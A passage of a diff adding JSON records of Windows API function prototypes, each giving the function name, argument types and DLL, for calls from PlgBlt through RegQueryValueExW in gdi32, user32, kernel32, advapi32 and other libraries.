PlgBlt(HDC hdcDest, CONST POINT * lpPoint, HDC hdcSrc, int nXSrc, int nYSrc, int nWidth, int nHeight, HBITMAP hbmMask, int xMask, int yMask);" + }, + { + "function_name": "PolyBezier", + "arguments": [ + "HDC", + "CONST POINT *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyBezier(HDC hdc, CONST POINT * lppt, DWORD cPoints);" + }, + { + "function_name": "PolyBezierTo", + "arguments": [ + "HDC", + "CONST POINT *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyBezierTo(HDC hdc, CONST POINT * lppt, DWORD cCount);" + }, + { + "function_name": "PolyDraw", + "arguments": [ + "HDC", + "CONST POINT *", + "CONST BYTE *", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyDraw(HDC hdc,CONST POINT * lppt, CONST BYTE * lpbTypes, int cCount);" + }, + { + "function_name": "PolyPolygon", + "arguments": [ + "HDC", + "CONST POINT", + "LPINT", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyPolygon(HDC hdc, CONST POINT *lpPoints, LPINT lpPolyCounts, int nCount);" + }, + { + "function_name": "PolyTextOutA", + "arguments": [ + "HDC", + "CONST POLYTEXT *", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyTextOutA(HDC hdc, CONST POLYTEXT * pptxt, int cStrings);" + }, + { + "function_name": "PolyTextOutW", + "arguments": [ + "HDC", + "const POLYTEXTW*", + "INT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolyTextOutW(HDC hdc, const POLYTEXTW* pptxt, INT cStrings);" + }, + { + "function_name": "Polygon", + "arguments": [ + "HDC", + "CONST POINT", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Polygon(HDC hdc,CONST POINT *lpPoints, int nCount);" + }, + { + "function_name": "Polyline", + "arguments": [ + "HDC", + "CONST POINT", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Polyline(HDC hdc,CONST POINT *lppt, int cPoints);" + }, + { + "function_name": "PolylineTo", + "arguments": [ + "HDC", + "CONST POINT *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PolylineTo(HDC hdc, CONST POINT * lppt, DWORD cCount);" + }, + { + "function_name": "PostMessageA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PostMessageA(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "PostMessageW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PostMessageW(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "PostQueuedCompletionStatus", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PostQueuedCompletionStatus(HANDLE CompletionPort,DWORD dwNumberOfBytesTransferred, DWORD dwCompletionKey, LPOVERLAPPED lpOverlapped);" + }, + { + "function_name": "PostQuitMessage", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "VOID PostQuitMessage(int nExitCode);" + }, + { + "function_name": "PostThreadMessageA", + "arguments": [ + "DWORD", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PostThreadMessageA(DWORD dwThreadId,UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "PostThreadMessageW", + "arguments": [ + "DWORD", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PostThreadMessageW(DWORD dwThreadId,UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "PrepareTape", + "arguments": [ + "HANDLE", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD PrepareTape(HANDLE hDevice,DWORD dwOperation, BOOL bImmediate);" + }, + { + "function_name": "PrintDlgA", + "arguments": [ + "LPPRINTDLG" + ], + "dll_name": "comdlg32.dll", + "full_prototype": "BOOL PrintDlgA(LPPRINTDLG lppd);" + }, + { + "function_name": "PrinterProperties", + "arguments": [ + "hwnd", + "HANDLE" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL PrinterProperties(hwnd hwnd,HANDLE hPrinter);" + }, + { + "function_name": "PrivilegeCheck", + "arguments": [ + "HANDLE", + "PPRIVILEGE_SET", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL PrivilegeCheck( HANDLE hClientToken, PPRIVILEGE_SET pps, LPBOOL lpfResult );" + }, + { + "function_name": "PrivilegedServiceAuditAlarmA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "HANDLE", + "PPRIVILEGE_SET", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL PrivilegedServiceAuditAlarmA( LPCTSTR lpszSubsystem, LPCTSTR lpszService, HANDLE hClientToken, PPRIVILEGE_SET pps, BOOL fAccessGranted );" + }, + { + "function_name": "PrivilegedServiceAuditAlarmW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "HANDLE", + "PPRIVILEGE_SET", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL PrivilegedServiceAuditAlarmW(LPCWSTR SubsystemName,LPCWSTR ServiceName,HANDLE ClientToken,PPRIVILEGE_SET Privileges,BOOL AccessGranted);" + }, + { + "function_name": "Process32First", + "arguments": [ + "HANDLE", + "LPPROCESSENTRY32" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);" + }, + { + "function_name": "Process32Next", + "arguments": [ + "HANDLE", + "LPPROCESSENTRY32" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WINAPI Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe);" + }, + { + "function_name": "PtInRect", + "arguments": [ + "CONST RECT", + "POINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL PtInRect(CONST RECT *lprc, POINT pt);" + }, + { + "function_name": "PtInRegion", + "arguments": [ + "HRGN", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PtInRegion(HRGN hrgn,int X, int Y);" + }, + { + "function_name": "PtVisible", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL PtVisible(HDC hdc, int X, int Y);" + }, + { + "function_name": "PulseEvent", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PulseEvent(HANDLE hEvent);" + }, + { + "function_name": "PurgeComm", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL PurgeComm(HANDLE hCommDev, DWORD fdwAction);" + }, + { + "function_name": "PwdChangePasswordA", + "arguments": [ + "LPCSTR", + "HWND", + "DWORD", + "LPCHANGEPWDINFOA" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WINAPI PwdChangePasswordA(LPCSTR lpProvider, HWND hWnd, DWORD flags, LPCHANGEPWDINFOA info);" + }, + { + "function_name": "QueryDosDeviceA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD QueryDosDeviceA(LPCTSTR lpDeviceName, LPTSTR lpTargetPath, DWORD ucchMax);" + }, + { + "function_name": "QueryDosDeviceW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD QueryDosDeviceW(LPCWSTR lpDeviceName, LPCWSTR lpTargetPath, DWORD ucchMax);" + }, + { + "function_name": "QueryPerformanceCounter", + "arguments": [ + "LARGE_INTEGER" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL QueryPerformanceCounter(LARGE_INTEGER *lpliPerformanceCount);" + }, + { + "function_name": "QueryPerformanceFrequency", + "arguments": [ + "LARGE_INTEGER" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL QueryPerformanceFrequency(LARGE_INTEGER *lpliPerformanceFreq);" + }, + { + "function_name": "QueueUserAPC", + "arguments": [ + "PAPCFUNC", + "HANDLE", + "ULONG_PTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);" + }, + { + "function_name": "RaiseException", + "arguments": [ + "DWORD", + "DWORD", + "DWORD", + "CONST DWORD *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD cArguments, CONST DWORD * lpArguments);" + }, + { + "function_name": "RasEnumEntriesA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPRASENTRYNAME", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "rasapi32.dll", + "full_prototype": "DWORD RasEnumEntriesA( LPTSTR reserved, LPTSTR lpszPhonebook, LPRASENTRYNAME lprasentryname, LPDWORD lpcb, LPDWORD lpcEntries );" + }, + { + "function_name": "ReadConsoleA", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPDWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleA(HANDLE hConsoleInput, LPVOID lpvBuffer, DWORD cchToRead, LPDWORD lpcchRead, LPVOID lpvReserved);" + }, + { + "function_name": "ReadConsoleW", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPDWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleW(HANDLE hConsoleInput, LPVOID lpBuffer, DWORD nNumberOfCharsToRead, LPDWORD lpNumberOfCharsRead, LPVOID lpReserved);" + }, + { + "function_name": "ReadConsoleInputA", + "arguments": [ + "HANDLE", + "PINPUT_RECORD", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleInputA(HANDLE hConsoleInput, PINPUT_RECORD pirBuffer,DWORD cInRecords, LPDWORD lpcRead);" + }, + { + "function_name": "ReadConsoleInputW", + "arguments": [ + "HANDLE", + "PINPUT_RECORD", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleInputW(HANDLE hConsoleInput, PINPUT_RECORD pirBuffer,DWORD cInRecords, LPDWORD lpcRead);" + }, + { + "function_name": "ReadConsoleOutputA", + "arguments": [ + "HANDLE", + "PCHAR_INFO", + "COORD", + "COORD", + "PSMALL_RECT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleOutputA(HANDLE hConsoleOutput, PCHAR_INFO pchiDestBuffer, COORD coordDestBufferSize, COORD coordDestBufferCoord, PSMALL_RECT psrctSourceRect);" + }, + { + "function_name": "ReadConsoleOutputW", + "arguments": [ + "HANDLE", + "PCHAR_INFO", + "COORD", + "COORD", + "PSMALL_RECT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleOutputW(HANDLE hConsoleOutput, PCHAR_INFO pchiDestBuffer, COORD coordDestBufferSize, COORD coordDestBufferCoord, PSMALL_RECT psrctSourceRect);" + }, + { + "function_name": "ReadConsoleOutputAttribute", + "arguments": [ + "HANDLE", + "LPWORD", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleOutputAttribute(HANDLE hConsoleOutput, LPWORD lpwAttribute, DWORD cReadCells,COORD coordReadCoord, LPDWORD lpcNumberRead);" + }, + { + "function_name": "ReadConsoleOutputCharacterA", + "arguments": [ + "HANDLE", + "LPTSTR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleOutputCharacterA(HANDLE hConsoleOutput, LPTSTR lpReadBuffer, DWORD cchRead,COORD coordReadCoord, LPDWORD lpcNumberRead);" + }, + { + "function_name": "ReadConsoleOutputCharacterW", + "arguments": [ + "HANDLE", + "LPCWSTR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadConsoleOutputCharacterW(HANDLE hConsoleOutput, LPCWSTR lpReadBuffer, DWORD cchRead,COORD coordReadCoord, LPDWORD lpcNumberRead);" + }, + { + "function_name": "ReadDirectoryChangesW", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "BOOL", + "DWORD", + "LPDWORD", + "LPOVERLAPPED", + "LPOVERLAPPED_COMPLETION_ROUTINE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadDirectoryChangesW( HANDLE hDirectory, LPVOID lpBuffer, DWORD nBufferLength, BOOL bWatchSubtree, DWORD dwNotifyFilter, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);" + }, + { + "function_name": "ReadEventLogA", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPVOID", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ReadEventLogA( HANDLE hEventLog, DWORD dwReadFlags, DWORD dwRecordOffset, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, DWORD *pnBytesRead, DWORD *pnMinNumberOfBytesNeeded );" + }, + { + "function_name": "ReadEventLogW", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPVOID", + "DWORD", + "DWORD*", + "DWORD*" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ReadEventLogW( HANDLE hEventLog, DWORD dwReadFlags, DWORD dwRecordOffset, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, DWORD* pnBytesRead, DWORD* pnMinNumberOfBytesNeeded );" + }, + { + "function_name": "ReadFile", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPDWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped);" + }, + { + "function_name": "ReadFileEx", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "LPOVERLAPPED", + "LPOVERLAPPED_COMPLETION_ROUTINE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadFileEx(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);" + }, + { + "function_name": "ReadProcessMemory", + "arguments": [ + "HANDLE", + "LPCVOID", + "LPVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, DWORD cbRead,LPDWORD lpNumberOfBytesRead);" + }, + { + "function_name": "RealizePalette", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT RealizePalette(HDC hdc);" + }, + { + "function_name": "Rectangle", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL Rectangle(HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect);" + }, + { + "function_name": "RectInRegion", + "arguments": [ + "HRGN", + "CONST RECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL RectInRegion(HRGN hrgn, CONST RECT *lprc);" + }, + { + "function_name": "RectVisible", + "arguments": [ + "HDC", + "CONST RECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL RectVisible(HDC hdc, CONST RECT *lprc);" + }, + { + "function_name": "RedrawWindow", + "arguments": [ + "HWND", + "CONST RECT", + "HRGN", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL RedrawWindow(HWND hwnd, CONST RECT *lprcUpdate, HRGN hrgnUpdate, UINT afuRedraw);" + }, + { + "function_name": "RegCloseKey", + "arguments": [ + "HKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegCloseKey( HKEY hKey );" + }, + { + "function_name": "RegConnectRegistryA", + "arguments": [ + "LPTSTR", + "HKEY", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegConnectRegistryA( LPTSTR lpszComputerName, HKEY hKey, PHKEY phkResult );" + }, + { + "function_name": "RegConnectRegistryW", + "arguments": [ + "LPCWSTR", + "HKEY", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegConnectRegistryW( LPCWSTR lpMachineName, HKEY hKey, PHKEY phkResult );" + }, + { + "function_name": "RegCreateKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegCreateKeyA( HKEY hKey, LPCTSTR lpszSubKey, PHKEY phkResult );" + }, + { + "function_name": "RegCreateKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegCreateKeyW( HKEY hkey, LPCWSTR lpSubKey, PHKEY phkResult );" + }, + { + "function_name": "RegCreateKeyExA", + "arguments": [ + "HKEY", + "LPCTSTR", + "DWORD", + "LPTSTR", + "DWORD", + "REGSAM", + "LPSECURITY_ATTRIBUTES", + "PHKEY", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegCreateKeyExA( HKEY hKey, LPCTSTR lpszSubKey, DWORD dwReserved, LPTSTR lpszClass, DWORD fdwOptions, REGSAM samDesired, LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition );" + }, + { + "function_name": "RegCreateKeyExW", + "arguments": [ + "HKEY", + "LPCWSTR", + "DWORD", + "LPWSTR", + "DWORD", + "REGSAM", + "SECURITY_ATTRIBUTES*", + "PHKEY", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegCreateKeyExW( HKEY hkey, LPCWSTR name, DWORD reserved, LPWSTR class, DWORD options, REGSAM access, SECURITY_ATTRIBUTES* sa, PHKEY retkey, LPDWORD dispos );" + }, + { + "function_name": "RegDeleteKeyA", + "arguments": [ + "HKEY", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegDeleteKeyA( HKEY hKey, LPCTSTR lpszSubKey );" + }, + { + "function_name": "RegDeleteKeyW", + "arguments": [ + "HKEY", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegDeleteKeyW( HKEY hkey, LPCWSTR name );" + }, + { + "function_name": "RegDeleteValueA", + "arguments": [ + "HKEY", + "LPTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegDeleteValueA( HKEY hKey, LPTSTR lpszValue );" + }, + { + "function_name": "RegDeleteValueW", + "arguments": [ + "HKEY", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegDeleteValueW( HKEY hkey, LPCWSTR name );" + }, + { + "function_name": "RegEnumKeyA", + "arguments": [ + "HKEY", + "DWORD", + "LPTSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegEnumKeyA( HKEY hKey, DWORD iSubKey, LPTSTR lpszName, DWORD cchName );" + }, + { + "function_name": "RegEnumKeyW", + "arguments": [ + "HKEY", + "DWORD", + "LPWSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegEnumKeyW( HKEY hkey, DWORD index, LPWSTR name, DWORD name_len );" + }, + { + "function_name": "RegEnumKeyExA", + "arguments": [ + "HKEY", + "DWORD", + "LPTSTR", + "LPDWORD", + "LPDWORD", + "LPTSTR", + "LPDWORD", + "PFILETIME" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegEnumKeyExA( HKEY hKey, DWORD iSubkey, LPTSTR lpszName, LPDWORD lpcchName, LPDWORD lpdwReserved, LPTSTR lpszClass, LPDWORD lpcchClass, PFILETIME lpftLastWrite );" + }, + { + "function_name": "RegEnumKeyExW", + "arguments": [ + "HKEY", + "DWORD", + "LPWSTR", + "LPDWORD", + "LPDWORD", + "LPWSTR", + "LPDWORD", + "FILETIME*" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegEnumKeyExW( HKEY hkey, DWORD index, LPWSTR name, LPDWORD name_len, LPDWORD reserved, LPWSTR class, LPDWORD class_len, FILETIME* ft );" + }, + { + "function_name": "RegEnumValueA", + "arguments": [ + "HKEY", + "DWORD", + "LPTSTR", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPBYTE", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegEnumValueA( HKEY hKey, DWORD iValue, LPTSTR lpszValue, LPDWORD lpcchValue, LPDWORD lpdwReserved, LPDWORD lpdwType, LPBYTE lpbData, LPDWORD lpcbData );" + }, + { + "function_name": "RegEnumValueW", + "arguments": [ + "HKEY", + "DWORD", + "LPWSTR", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPBYTE", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegEnumValueW( HKEY hkey, DWORD index, LPWSTR value, LPDWORD val_count, LPDWORD reserved, LPDWORD type, LPBYTE data, LPDWORD count );" + }, + { + "function_name": "RegFlushKey", + "arguments": [ + "HKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegFlushKey(HKEY hKey);" + }, + { + "function_name": "RegGetKeySecurity", + "arguments": [ + "HKEY", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegGetKeySecurity( HKEY hkey, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, LPDWORD lpcbSecurityDescriptor );" + }, + { + "function_name": "RegisterClassA", + "arguments": [ + "CONST WNDCLASS" + ], + "dll_name": "user32.dll", + "full_prototype": "ATOM RegisterClassA(CONST WNDCLASS *lpwc);" + }, + { + "function_name": "RegisterClassExA", + "arguments": [ + "CONST WNDCLASSEX FAR" + ], + "dll_name": "user32.dll", + "full_prototype": "ATOM RegisterClassExA(CONST WNDCLASSEX FAR *lpwcx);" + }, + { + "function_name": "RegisterClassExW", + "arguments": [ + "CONST WNDCLASSEXW FAR" + ], + "dll_name": "user32.dll", + "full_prototype": "ATOM RegisterClassExW(CONST WNDCLASSEXW FAR *lpwcx);" + }, + { + "function_name": "RegisterClassW", + "arguments": [ + "CONST WNDCLASSW" + ], + "dll_name": "user32.dll", + "full_prototype": "ATOM RegisterClassW(CONST WNDCLASSW *lpwc);" + }, + { + "function_name": "RegisterClipboardFormatA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT RegisterClipboardFormatA(LPCTSTR lpszFormat);" + }, + { + "function_name": "RegisterClipboardFormatW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT RegisterClipboardFormatW(LPCWSTR lpszFormat);" + }, + { + "function_name": "RegisterDeviceNotificationA", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDEVNOTIFY RegisterDeviceNotificationA( HANDLE hRecipient, LPVOID NotificationFilter, DWORD Flags);" + }, + { + "function_name": "RegisterHotKey", + "arguments": [ + "HWND", + "int", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL RegisterHotKey(HWND hwnd, int idHotKey, UINT fuModifiers, UINT uVirtKey);" + }, + { + "function_name": "RegisterServiceProcess", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD RegisterServiceProcess(DWORD dwProcessId,DWORD dwType);" + }, + { + "function_name": "RegisterWindowMessageA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT RegisterWindowMessageA(LPCTSTR lpsz);" + }, + { + "function_name": "RegisterWindowMessageW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT RegisterWindowMessageW(LPCWSTR lpsz);" + }, + { + "function_name": "RegLoadKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegLoadKeyA( HKEY hKey, LPCTSTR lpszSubKey, LPCTSTR lpszFile );" + }, + { + "function_name": "RegLoadKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegLoadKeyW( HKEY hkey, LPCWSTR subkey, LPCWSTR filename );" + }, + { + "function_name": "RegNotifyChangeKeyValue", + "arguments": [ + "HKEY", + "BOOL", + "DWORD", + "HANDLE", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegNotifyChangeKeyValue( HKEY hKey, BOOL fWatchSubTree, DWORD fdwNotifyFilter, HANDLE hEvent, BOOL fAsync );" + }, + { + "function_name": "RegOpenKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegOpenKeyA( HKEY hKey, LPCTSTR lpszSubKey, PHKEY phkResult );" + }, + { + "function_name": "RegOpenKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegOpenKeyW( HKEY hkey, LPCWSTR name, PHKEY retkey );" + }, + { + "function_name": "RegOpenKeyExA", + "arguments": [ + "HKEY", + "LPCTSTR", + "DWORD", + "REGSAM", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegOpenKeyExA( HKEY hKey, LPCTSTR lpszSubKey, DWORD dwReserved, REGSAM samDesired, PHKEY phkResult );" + }, + { + "function_name": "RegOpenKeyExW", + "arguments": [ + "HKEY", + "LPCWSTR", + "DWORD", + "REGSAM", + "PHKEY" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegOpenKeyExW( HKEY hkey, LPCWSTR name, DWORD reserved, REGSAM access, PHKEY retkey );" + }, + { + "function_name": "RegQueryInfoKeyA", + "arguments": [ + "HKEY", + "LPTSTR", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "PFILETIME" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegQueryInfoKeyA( HKEY hKey, LPTSTR lpszClass, LPDWORD lpcchClass, LPDWORD lpdwReserved, LPDWORD lpcSubKeys, LPDWORD lpcchMaxSubkey, LPDWORD lpcchMaxClass, LPDWORD lpcValues, LPDWORD lpcchMaxValueName, LPDWORD lpcbMaxValueData, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime );" + }, + { + "function_name": "RegQueryInfoKeyW", + "arguments": [ + "HKEY", + "LPWSTR", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "FILETIME*" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegQueryInfoKeyW( HKEY hkey, LPWSTR class, LPDWORD class_len, LPDWORD reserved, LPDWORD subkeys, LPDWORD max_subkey, LPDWORD max_class, LPDWORD values, LPDWORD max_value, LPDWORD max_data, LPDWORD security, FILETIME* modif );" + }, + { + "function_name": "RegQueryMultipleValuesA", + "arguments": [ + "HKEY", + "PVALENT", + "DWORD", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegQueryMultipleValuesA( HKEY hKey, PVALENT val_list, DWORD num_vals, LPTSTR lpValueBuf, LPDWORD ldwTotsize );" + }, + { + "function_name": "RegQueryMultipleValuesW", + "arguments": [ + "HKEY", + "PVALENTW", + "DWORD", + "LPWSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegQueryMultipleValuesW( HKEY hkey, PVALENTW val_list, DWORD num_vals, LPWSTR lpValueBuf, LPDWORD ldwTotsize );" + }, + { + "function_name": "RegQueryValueA", + "arguments": [ + "HKEY", + "LPCTSTR", + "LPTSTR", + "PLONG" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegQueryValueA( HKEY hKey, LPCTSTR lpszSubKey, LPTSTR lpszValue, PLONG pcbValue );" + }, + { + "function_name": "RegQueryValueW", + "arguments": [ + "HKEY", + "LPCWSTR", + "LPWSTR", + "LPLONG" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegQueryValueW( HKEY hkey, LPCWSTR name, LPWSTR data, LPLONG count );" + }, + { + "function_name": "RegQueryValueExA", + "arguments": [ + "HKEY", + "LPTSTR", + "LPDWORD", + "LPDWORD", + "LPBYTE", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegQueryValueExA( HKEY hKey, LPTSTR lpszValueName, LPDWORD lpdwReserved, LPDWORD lpdwType, LPBYTE lpbData, LPDWORD lpcbData );" + }, + { + "function_name": "RegQueryValueExW", + "arguments": [ + "HKEY", + "LPCWSTR", + "LPDWORD", + "LPDWORD", + "LPBYTE", + 